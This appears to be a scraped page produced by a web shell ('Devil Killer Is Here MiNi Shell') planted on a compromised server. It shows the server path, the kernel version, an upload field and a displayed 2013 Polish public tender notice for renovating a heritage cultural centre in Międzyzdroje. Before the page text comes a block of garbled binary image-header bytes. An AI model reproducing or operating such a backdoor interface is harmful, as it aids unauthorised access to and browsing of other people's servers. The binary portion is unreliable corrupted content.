JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130201/44506-N-2013.html

<p class="kh_header"><b>Międzyzdroje: Remont elewacji zabytkowego budynku Międzynarodowego Domu Kultury wraz z pracami uzupełniającymi .</b><br>
<b>Numer ogłoszenia: 44506 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Międzynarodowy Dom Kultury , ul. Bohaterów Warszawy 20, 72-500 Międzyzdroje, woj. zachodniopomorskie, tel. 91 3282600, faks 91 3271625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mdk.miedzyzdroje.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont elewacji zabytkowego budynku Międzynarodowego Domu Kultury wraz z pracami uzupełniającymi ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont elewacji zabytkowego budynku Międzynarodowego Domu Kultury wraz z pracami uzupełniającymi.
Szczegółowy opis przedmiotu zamówienia:
Budynek Międzynarodowego Domu Kultury w Międzyzdrojach decyzją Państwowej Służby Ochrony Zabytków decyzją z dnia 19.06.1996 r. został wpisany do rejestru zabytków pod numerem A -1312. 
Przedmiotem zamówienia jest remont elewacji z wystrojem sztukatorskim, naprawa i uzupełnienie tynków w elewacji i naprawa i malowanie stolarki okiennej i drzwiowej, kolorystyka elewacji Międzynarodowego Domu Kultury w Międzyzdrojach działki nr 219 i 218/1 przy ul. Boh. Warszawy w Międzyzdrojach oraz wykonanie ścianki szczelnej - ekranu zagłębionego w gruncie w dz.  nr ewid. gr. 219  przy ulicy Bohaterów Warszawy 20 w obr. 20 Międzyzdroje.
Szczegółowa kolorystyka elewacji według załączonych rysunków do Projektu Budowlanego stanowiących załącznik SIWZ. Kolorystyka elewacji ścian zostaje zachowana, podana wg wzornika kolorów NCS, uniwersalnego dla wszystkich producentów farb, stosujemy farby silikatowe, ściany cokołu NCS S 0540-Y10R. Ściany powyżej cokoły NCS S 0515 -Y10R.  
Elementy sztukatorskie: opaski okienne i drzwiowe, gzymsy, tralki, głowice kolumn i pilastrów kolor biały.
Ściany, elementy sztukatorskie przed malowaniem należy oczyścić, zeskrobać starą farbę i zmyć. Ubytki tynku należy uzupełnić, przeszpachlować powierzchnie i zagruntować. Po przygotowaniu ścian, elementów sztukatorskich można przystąpić do malowania, stosując farby silikatowe. 
Elementy kowalsko - ślusarskie (balustrady) - kolor szary. Balustrady wykonane z elementów stalowych należy oczyścić z korozji, zagruntować i pomalować w kolorze szarym. Sprawdzić  stan zakotwienia balustrad w murze. 
Okna i drzwi kolor biały. Stolarka okienna i drzwiowa istniejąca, poddana renowacji i  pomalowana w kolorze białym. 
Przy wykonaniu elewacji należy dokonać przeglądu instalacji odwodnienia połaci dachów i regulacji oraz sprawdzenie wszelkiego rodzaju obróbek blacharskich : opierzeń ścian, gzymsów, parapetów zewnętrznych. 
Schody zewnętrzne wymiana okładzin z płytek gresowych na okładziny z kamienia naturalnego-granit oraz wymiana płytek klinkierowych na murkach oporowych na płytki klinkierowe, zachować kolorystykę istniejących płytek. 



Przedmiotem zamówienia jest również wykonanie ścianki szczelnej w formie ekranu akustycznego . Należy wykonać ekran poprzez wciskanie ścianki szczelnej w odległości 1.0 - 1.2 m od lica ściany zewnętrznej aż do strefy wodonośnej (około 1.0 m poniżej poziomu wody gruntowej) i około 60 cm poniżej poziomu posadowienia obiektu. Wykonanie takiej ścianki odizoluje obiekt od przekazywania drgań poprzez grunt na fundament i obiekt w całości. 
Szczegółowy opis przedmiotu zamówienia stanowi projekt budowlano - wykonawczy, specyfikacja techniczna wykonania i odbioru robót i na tej podstawie należy wycenić ofertę.. Przedmiar robót jest tylko elementem pomocniczym służącym do wyceny przedmiotu zamówienia.
 Wszystkie wskazania zawarte w SIWZ, dokumentacji projektowej, Specyfikacji 
 Technicznej Wykonania i Odbioru Robót z nazwy urządzeń, materiałów należy rozumieć 
 jako określenie wymaganych parametrów technicznych lub standardów jakościowych.   
 Oznacza to, że zgodnie z art. 29 ust. 3  ustawy Prawo zamówień publicznych, Zamawiający 
 dopuszcza urządzenia, materiały równoważne.

Zamówienie współfinansowane  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rybackiego :  Program Operacyjny Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 w ramach Środka 4.1 Rozwój obszarów zależnych od rybactwa  objętego osią priorytetową 4 - Zrównoważony rozwój obszarów zależnych od rybactwa.  

Kod CPV  45000000-7; 454530007; 45110000-1; 45100000-8; 45410000-4; 45442100-8;   
                 45442000-7; 45262510-3; 45431000-7; 45240000-1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.11.00.00-1, 45.10.00.00-8, 45.41.00.00-4, 45.44.21.00-8, 45.44.20.00-7, 45.26.25.10-3, 45.43.10.00-7, 45.24.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę wykonanie (zakończenie) w okresie 
          ostatnich pięciu lat   przed  upływem terminu składnia ofert , a jeżeli okres  prowadzenia 
          działalności jest  krótszy - w  tym okresie co najmniej  dwóch  robót budowlanych  
          polegających na wykonaniu prac remontowych dotyczących elewacji i/lub stolarki 
          zewnętrznej budynku  o wartości  robót brutto nie mniejszej niż 400 000,00 zł każda w tym 
          jedna dotyczy  wykonania prac  remontowych elewacji/lub stolarki zewnętrznej budynku 
          zabytkowego tj. wpisanego do rejestru zabytków lub znajdujących się pod ochroną 
          konserwatorską,  z  podaniem ich rodzaju i  wartości,   daty i miejsca  
          wykonania oraz załączeniem dokumentu potwierdzającego, że roboty te zostały  
          wykonane  zgodnie z  zasadami sztuki   budowlanej i  prawidłowo ukończone, 

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu 
       o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje:
a) Kierownikiem robót budowlanych o specjalności konstrukcyjno - budowlanej,  który     
    odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych   
     wpisanych do rejestru zabytków,
b)  osobą, która posiada tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych   
     na kierunku konserwacja i restauracja dzieł sztuki lub w specjalności w zakresie 
     konserwacji zabytków oraz odbyła po ukończeniu tych studiów co najmniej 12-miesięczną 
     praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru 


  zabytków  lub  posiada świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający posiadanie kwalifikacji zawodowych odpowiadających danej dziedzinie oraz odbyła co najmniej 5-letnia praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytku.

. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu 
       o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest posiadanie przez Wykonawcę  
           opłaconej  polisy, a w przypadku jej braku innego dokumentu potwierdzającego  że 
           wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie   prowadzonej 
           działalności związanej z   przedmiotem zamówienia o wysokości   minimum               250 000,00 zł   (słownie: dwieście pięćdziesiąt tysięcy zł).
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu 
       o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
       granicznego - spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pisemne zobowiązanie innych podmiotów do oddania do   dyspozycji niezbędnych  
                zasobów na okres korzystania z nich przy wykonywaniu  zamówieniu jeżeli  
               Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału na   
                potencjał innych podmiotów .
    2. Harmonogram rzeczowo -finansowy robót załączony  przez Wykonawcę,
   3. Kosztorys ofertowy załączony przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian 
Zamawiający na podstawie art.144 ustawy prawo zamówień publicznych może 
dokonać zmiany umowy jeżeli zmiany te są korzystne dla Zamawiającego oraz 
przedłużyć termin wykonania przedmiotu umowy o czas  opóźnienia , jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
- zawieszenia robót przez zamawiającego,
- wykopalisk uniemożliwiających wykonywanie robót, 
- szczególnie niesprzyjających warunków atmosferycznych,
- zmian dokumentacji projektowej, 
- siły wyższej, 
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu  
   zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te  
   zmiany są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mdk.miedzyzdroje.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzynarodowy Dom Kultury ulica Bohaterów Warszawy 20 72-500 Międzyzdroje.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2013 godzina 10:00, miejsce: w siedzibie zamawiającego
               Międzynarodowy Dom Kultury 
               Ul. Bohaterów  Warszawy 20 
               72 - 500 Międzyzdroje 
               Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rybackiego :  Program Operacyjny Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 w ramach Środka 4.1 Rozwój obszarów zależnych od rybactwa  objętego osią priorytetową 4 - Zrównoważony rozwój obszarów zależnych od rybactwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com